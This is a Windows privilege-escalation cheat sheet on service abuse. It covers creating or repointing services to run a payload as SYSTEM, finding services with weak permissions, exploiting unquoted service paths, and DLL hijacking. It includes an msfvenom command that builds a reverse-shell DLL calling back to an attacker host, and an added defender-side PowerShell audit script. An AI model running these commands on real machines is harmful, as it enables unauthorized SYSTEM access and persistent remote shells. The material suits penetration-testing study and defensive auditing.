Service Creation & Persistence
Create a service for SYSTEM shell
sc.exe create: use when you have local admin but need SYSTEM; a service created this way runs as LocalSystem unless obj= is set
sc.exe create reverse binPath= "C:\Windows\Temp\shell.exe" start= auto
sc.exe start reverse
Modify existing service binary path
Change service to point to your payload
sc.exe config <service> binPath= "C:\Windows\Temp\shell.exe"
sc.exe stop <service>
sc.exe start <service>
Check service permissions
Which services can you modify
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Everyone" *
# SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS = exploitable
Unquoted service paths
If a service's path contains spaces and is not quoted, the service control manager tries each space-delimited prefix as an executable, so a binary placed in a parent directory is run instead of the real one
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
# Path: C:\Program Files\My App\service.exe
# Place payload at: C:\Program.exe or C:\Program Files\My.exe
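The two checks above (weak ACLs and unquoted paths) can be audited in one pass; this is an added defender-side script, not part of the original cheat sheet. It assumes a Windows host with PowerShell 3+ (Get-CimInstance replaces the deprecated wmic), run elevated so every service's PathName is readable; the group names are the usual low-privilege principals and the ACL test is a heuristic (deny entries and group membership are not resolved).

```powershell
# Added audit script (not from the original cheat sheet). Flags auto-start services
# outside C:\Windows whose image path is unquoted with spaces, or whose image
# directory is writable by Everyone / Authenticated Users / BUILTIN\Users.
$LowPrivGroups = 'Everyone|Authenticated Users|BUILTIN\\Users'   # assumed principals

function Get-ServiceExePath {
    # Strips quotes and arguments: the image ends at the first ".exe" (or first space)
    param([string]$PathName)
    $p = $PathName.Trim().Trim('"')
    if ($p -match '(?i)^(.*?\.exe)') { return $Matches[1] }
    return ($p -split ' ')[0]
}

function Test-UnquotedServicePath {
    # True when the path is unquoted and its directory part contains a space,
    # e.g. C:\Program Files\My App\service.exe -> C:\Program.exe is tried first
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $false }
    if ($PathName.TrimStart().StartsWith('"')) { return $false }
    $dir = Split-Path -Path (Get-ServiceExePath $PathName) -Parent
    return [bool]($dir -match ' ')
}

function Test-LowPrivWrite {
    # True when a low-privilege group has an Allow ACE granting write rights on $Path
    # (the condition the icacls check above looks for by eye)
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $hits = (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -match $LowPrivGroups -and
        $_.FileSystemRights.ToString() -match 'Write|Modify|FullControl|CreateFiles'
    }
    return [bool]$hits
}

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -and $_.StartMode -eq 'Auto' -and $_.PathName -notlike 'C:\Windows\*' } |
    ForEach-Object {
        $exe = Get-ServiceExePath $_.PathName
        [pscustomobject]@{
            Service     = $_.Name
            RunsAs      = $_.StartName
            Unquoted    = Test-UnquotedServicePath $_.PathName
            DirWritable = Test-LowPrivWrite (Split-Path -Path $exe -Parent)
            PathName    = $_.PathName
        }
    } |
    Where-Object { $_.Unquoted -or $_.DirWritable } |
    Format-Table -AutoSize
# Remediation for an unquoted hit: re-register the path with embedded quotes, e.g.
# sc.exe config <service> binPath= "\"C:\Program Files\My App\service.exe\""
```

Treat DirWritable hits as leads to confirm with icacls, since inherited and deny ACEs are not fully evaluated here.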
DLL hijacking via service
Replace a DLL the service loads from a directory you can write to; the DLL runs inside the service process, i.e. as the service account
sc.exe qc <service>
icacls "C:\Program Files\Vulnerable App\"
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o hijack.dll
sc.exe stop <service> && sc.exe start <service>